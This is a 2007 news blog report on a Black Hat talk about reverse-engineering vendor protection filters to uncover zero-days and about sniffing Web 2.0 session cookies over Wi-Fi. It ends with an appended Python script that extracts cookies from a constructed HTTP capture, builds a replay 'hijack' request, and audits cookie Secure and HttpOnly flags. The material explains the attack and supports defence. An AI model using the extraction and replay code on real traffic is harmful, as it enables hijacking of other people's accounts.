News Blog

August 2, 2007 3:38 PM PDT

Researcher: Web 2.0 vulnerable to cookie theft

by Robert Vamosi

LAS VEGAS--Robert Graham of Errata Security on Thursday showed how reverse engineering a security product's own protection updates can uncover a treasure trove of zero-day vulnerabilities. He also demonstrated a man-in-the-middle attack scenario, session-cookie sniffing over wireless, that affects several popular Web 2.0 sites. He did so in a talk at Black Hat titled "The Lazy Hacker's Guide to TCB (Taking Care of Business)."

David Maynor, who is no stranger to controversy at Black Hat, was scheduled to speak alongside Graham, but Maynor was called away at 4 a.m. by a client in need. Errata CEO Graham presented the talk solo.

In part one, Graham talked about reverse engineering the protections that come out of TippingPoint's Zero Day Initiative. The Zero Day Initiative is a program where researchers are paid for new, undisclosed vulnerabilities. What Maynor and Graham found was that TippingPoint then sent out protection filters to its clients, and those filters could be reverse-engineered to reveal the vulnerability each one covers. Attackers already do this with Microsoft patches; the difference is that a ZDI filter ships before the affected vendor has patched, so what it reveals is a vulnerability that has not been made public. The methods shown in the Black Hat talk have since been fixed by TippingPoint, but Graham pointed out that the same process could be used against other zero-day marketplaces, such as those run by eEye and IBM ISS.

In the second part of the talk, Graham showed how he could wirelessly sniff the session cookies used by Web 2.0 sites such as Google's Gmail, Facebook and MySpace.com. He said these sites seem to ignore the fact that sniffing for session cookies has been around for years. As an example, during the talk he sniffed the wireless network in the room at Black Hat and, from those results, pulled out a session cookie for Gmail. Within minutes he had that person's Gmail account displayed on the projection screen. With the stolen cookie he could send messages as that person, read all the mail in the account, and change settings, such as changing the sender message to "I love sheep" or changing the screen colors. What he could not do was change the account's password, since that requires the password itself rather than just the session cookie.

Graham said Gmail allows you to choose "https" protection, and urged everyone to do so. He said Facebook and other Web 2.0 sites don't offer that, which leaves their sessions open to theft. Until they do, simply do not use those accounts on public Wi-Fi, such as at an Internet cafe or in an airport waiting area. One caveat applies even to sites that offer https: the session cookie must also be marked Secure, otherwise the browser will still send it in the clear the first time it touches the site over plain http, and the attacker gets it anyway.
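As an added example (not code from Graham's talk or from CNET), here is a small Python script that does to a plaintext capture what the demo above does by hand: it splits the captured bytes into HTTP messages, pulls the Cookie header sent to each host, builds the replay request an attacker would send with the stolen cookie, and audits each Set-Cookie from the server for the Secure and HttpOnly attributes that decide whether the "https" option actually protects the session. The capture, paths, cookie names and cookie values are constructed for illustration; the host names are used only to match the sites named in the article, and pairing a response with the preceding request's host is an assumption that holds for a single-client capture like this one.

```python
"""Sidejacking demo: extract session cookies from captured plaintext HTTP,
build the replay request, and audit Set-Cookie flags.

Example code added to this article; the capture below is constructed, not
real traffic, and the cookie names/values are made up.
"""
import re
from dataclasses import dataclass

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/1\.[01]$")

# Constructed sample of what a sniffer on an open Wi-Fi network sees: one Gmail
# request/response pair (with a 5-byte body) followed by a Facebook request.
CAPTURE = (
    b"GET /mail/ HTTP/1.1\r\n"
    b"Host: mail.google.com\r\n"
    b"Cookie: sess=c0n5tructedT0ken1; prefs=en\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: sess=c0n5tructedT0ken1; Domain=mail.google.com; Path=/mail\r\n"
    b"Set-Cookie: prefs=en; Domain=.google.com; Path=/; Secure; HttpOnly\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"hello"
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"Cookie: c_sess=c0n5tructedT0ken2\r\n"
    b"\r\n"
)


@dataclass
class Message:
    is_request: bool
    start_line: str
    headers: list  # (lowercased name, value) pairs; repeats (Set-Cookie) kept

    def get_all(self, name):
        name = name.lower()
        return [v for n, v in self.headers if n == name]

    def get(self, name, default=None):
        vals = self.get_all(name)
        return vals[0] if vals else default


def parse_http(capture: bytes) -> list:
    """Split a plaintext capture into HTTP messages, honouring Content-Length
    so a response body is not mistaken for the start of the next message."""
    messages, pos = [], 0
    while True:
        end = capture.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        lines = capture[pos:end].decode("latin-1").split("\r\n")
        headers = []
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
        msg = Message(bool(REQUEST_LINE.match(lines[0])), lines[0], headers)
        messages.append(msg)
        pos = end + 4 + int(msg.get("content-length", "0"))
    return messages


def extract_sessions(messages) -> dict:
    """Map each host to the cookies a client sent in the clear. Each of these is
    a bearer token: whoever presents it to the site is that user."""
    sessions = {}
    for msg in messages:
        host, cookie = msg.get("host"), msg.get("cookie")
        if not (msg.is_request and host and cookie):
            continue
        jar = sessions.setdefault(host, {})
        for pair in cookie.split(";"):
            name, _, value = pair.strip().partition("=")
            if name:
                jar[name] = value
    return sessions


def audit_set_cookies(messages) -> list:
    """Report cookies a server set without Secure/HttpOnly. Without Secure the
    browser also sends the cookie over plain http, so offering https alone does
    not protect it. Responses carry no Host header, so the host is taken from
    the preceding request (assumption: single-client, in-order capture)."""
    findings, host = [], None
    for msg in messages:
        if msg.is_request:
            host = msg.get("host", host)
            continue
        for sc in msg.get_all("set-cookie"):
            parts = [p.strip() for p in sc.split(";")]
            name = parts[0].partition("=")[0]
            attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
            missing = [a for a in ("secure", "httponly") if a not in attrs]
            if missing:
                findings.append((host, name, missing))
    return findings


def hijack_request(host: str, path: str, jar: dict) -> bytes:
    """The request an attacker replays with the stolen cookies. No password or
    other secret is needed, which is why sidejacking works."""
    cookie = "; ".join(f"{k}={v}" for k, v in jar.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


if __name__ == "__main__":
    msgs = parse_http(CAPTURE)
    sessions = extract_sessions(msgs)
    for host, jar in sessions.items():
        print(f"{host}: {jar}")
    for host, name, missing in audit_set_cookies(msgs):
        print(f"{host}: cookie {name!r} lacks {', '.join(missing)}")
    print(hijack_request("mail.google.com", "/mail/", sessions["mail.google.com"]).decode())
```

Run against a real capture, the same loop would take the output of a sniffer's TCP reassembly instead of the constructed `CAPTURE`; the point the script makes is that the attacker's "login" is nothing more than the `Cookie` header the victim's browser already broadcast, and that a site is only protected by https when its session cookie carries the Secure attribute.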
